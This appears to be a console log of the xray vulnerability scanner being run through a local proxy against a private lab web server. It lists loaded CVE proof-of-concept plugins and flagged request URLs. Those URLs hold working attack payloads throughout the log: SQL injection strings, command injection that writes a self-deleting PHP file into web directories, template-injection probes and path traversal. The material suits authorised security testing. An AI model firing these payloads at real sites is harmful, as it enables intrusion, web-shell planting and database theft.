C:\xray_windows_amd64.exe>xray_windows_amd64.exe ws --listen 127.0.0.1:7777 --html-output result_new.html

____ ___.________. ____. _____.___.

\ \/ /\_ __ \ / _ \ \__ | |

\ / | _ _/ / /_\ \ / | |

/ \ | | \/ | \ \____ |

\___/\ \ |____| /\____|_ / / _____/

\_/ \_/ \_/ \/

Version: 1.8.4/a47961e0/COMMUNITY

[INFO] 2022-04-27 15:21:16 [default:entry.go:213] Loading config file from

[WARN] 2022-04-27 15:21:16 [default:webscan.go:222] disable these plugins as that's not an advanced version, [fastjson shiro struts thinkphp]

Enabled plugins: [crlf-injection upload xss brute-force cmd-injection jsonp xxe sqldet ssrf phantasm baseline dirscan path-traversal redirect]

[INFO] 2022-04-27 15:21:16 [phantasm::180] 358 pocs have been loaded (debug level will show more details)

These plugins will be disabled as reverse server is not configured, check out the reference to fix this error.

Ref: /#/configration/reverse

Plugins:

poc-yaml-dlink-cve-2019-16920-rce

poc-yaml-jenkins-cve-2018-1000600

poc-yaml-jira-cve-2019-11581

poc-yaml-jira-ssrf-cve-2019-8451

poc-yaml-mongo-express-cve-2019-10758

poc-yaml-pandorafms-cve-2019-20224-rce

poc-yaml-saltstack-cve-2020-16846

poc-yaml-solr-cve-2017-12629-xxe

poc-yaml-supervisord-cve-2017-11610

poc-yaml-weblogic-cve-2017-10271

ssrf/ssrf/default

xxe/xxe/blind

[INFO] 2022-04-27 15:21:16 [collector::215] loading cert from ./ and ./

[INFO] 2022-04-27 15:21:17 [collector::270] starting mitm server at 127.0.0.1:7777

[INFO] 2022-04-27 15:23:03 [default::433] processing GET ./suggest?word=http%3A%2F%2F192.168.72.135%3A8080%2F&callback=suggest360&encodein=utf-8&encodeout=utf-8&format=json

[INFO] 2022-04-27 15:23:04 [default::433] processing GET http://192.168.72.135:8080/

[Vuln: baseline]

Target "http://192.168.72.135:8080/include/?dir=http\\..\\admin\\login\\login_check.php"

VulnType "sensitive/server-error"

[*] scanned: 0, pending: 2, requestSent: 454, latency: 77.58ms, failedRatio: 0.00%

[Vuln: baseline]

Target "http://192.168.72.135:8080/?template=tag_(){}%3b@unlink(file)%3becho md5($_GET[1])%3b{//../rss"

VulnType "sensitive/server-error"

[Vuln: baseline]

Target "http://192.168.72.135:8080/?m=&c=AjaxPersonal&a=company_focus&company_id[0]=match&company_id[1][0]=aaaaaaa\") and extractvalue(1,concat(0x7e,md5(99999999))) -- a"

VulnType "sensitive/server-error"

[*] scanned: 0, pending: 2, requestSent: 995, latency: 71.68ms, failedRatio: 0.00%

[Vuln: baseline]

Target "http://192.168.72.135:8080/include/?Event=http|echo%20\"<?php%20echo%20md5(fvykoshcnl);unlink(__FILE__);?>\"%20>>%20/usr/www/%20&&%20chmod%20755%20/usr/www/||"

VulnType "sensitive/server-error"

[Vuln: baseline]

Target "http://192.168.72.135:8080/?q=user/password&name[%23post_render][]=printf&name[%23type]=markup&name[%23markup]=yjet%25%25vpms"

VulnType "sensitive/server-error"

[Vuln: baseline]

Target "http://192.168.72.135:8080/member/ajax_membergroup.php?action=post&membergroup=@`'`/*!50000Union+*/+/*!50000select+*/+md5(981009000)+--+@`'`"

VulnType "sensitive/server-error"

[Vuln: baseline]

Target "http://192.168.72.135:8080/manager/radius/server_ping.php?ip=127.0.0.1|echo%20\"<?php%20echo%20md5(iowesdrcxu);unlink(__FILE__);?>\">../../&id=1"

VulnType "sensitive/server-error"

[Vuln: baseline]

Target "http://192.168.72.135:8080/public//home/index/bind_follow/?publicid=1&is_ajax=1&uid[0]=exp&uid[1]=)%20and%20updatexml(1,concat(0x7e,md5(208261576),0x7e),1)--+"

VulnType "sensitive/server-error"

[Vuln: baseline]

Target "http://192.168.72.135:8080/comment/api/?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20md5(202072102)))),@`%27`"

VulnType "sensitive/server-error"

[Vuln: baseline]

Target "http://192.168.72.135:8080/include/plugin/payment/alipay/?id=pay`%20where%201=1%20union%20select%201,2,CONCAT%28md5(200188526)%29,4,5,6,7,8,9,10,11,12%23_"

VulnType "sensitive/server-error"

[Vuln: baseline]

Target "http://192.168.72.135:8080/f/?job=getzone&typeid=zone&fup=..\\..\\do\\js&id=514125&webdb[web_open]=1&webdb[cache_time_js]=-1&pre=qb_label%20where%20lid=-1%20UNION%20SELECT%201,2,3,4,5,6,0,md5(208912940),9,10,11,12,13,14,15,16,17,18,19%23"

VulnType "sensitive/server-error"

[Vuln: baseline]

Target "http://192.168.72.135:8080/plus/ajax_officebuilding.php?act=key&key=錦%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,2,3,md5(209998525),5,6,7,8,9%23"

VulnType "sensitive/server-error"

[Vuln: baseline]

Target "http://192.168.72.135:8080/?action=grouppermission&gids[99]=%27&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat((select%20concat(user,0x3a,md5(1234),0x3a)%20from%%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23"

VulnType "sensitive/server-error"

[Vuln: baseline]

Target "http://192.168.72.135:8080/wp-content/plugins/mailpress/mp-includes/?action=iview&id=<nil>"

VulnType "sensitive/server-error"

[Vuln: baseline]

Target "http://192.168.72.135:8080/get_luser_by_sshport.php?clientip=1;echo%20\"<?php%20echo%20md5(jgcuboeaqe);unlink(__FILE__);?>\">/opt/freesvr/web/htdocs/freesvr/audit/;&clientport=1"

VulnType "sensitive/server-error"

[Vuln: baseline]

Target "http://192.168.72.135:8080/actions/seomatic/meta-container/meta-link-container/?uri={{43203*'41244'}}"

VulnType "sensitive/server-error"

[Vuln: baseline]

Target "http://192.168.72.135:8080/actions/seomatic/meta-container/all-meta-containers?uri={{43203*'41244'}}"

VulnType "sensitive/server-error"

[Vuln: dirscan]

Target "http://192.168.72.135:8080/examples/"

VulnType "debug/default"

Payload "/examples/"

忽略。。。。。

[WARN] 2022-04-27 15:23:16 [default::34] receive signal: interrupt

[*] scanned: 1, pending: 1, requestSent: 1942, latency: 67.60ms, failedRatio: 0.00%

[INFO] 2022-04-27 15:23:17 [collector::294] mitm server stopped

[INFO] 2022-04-27 15:23:17 [controller::562] controller released, task done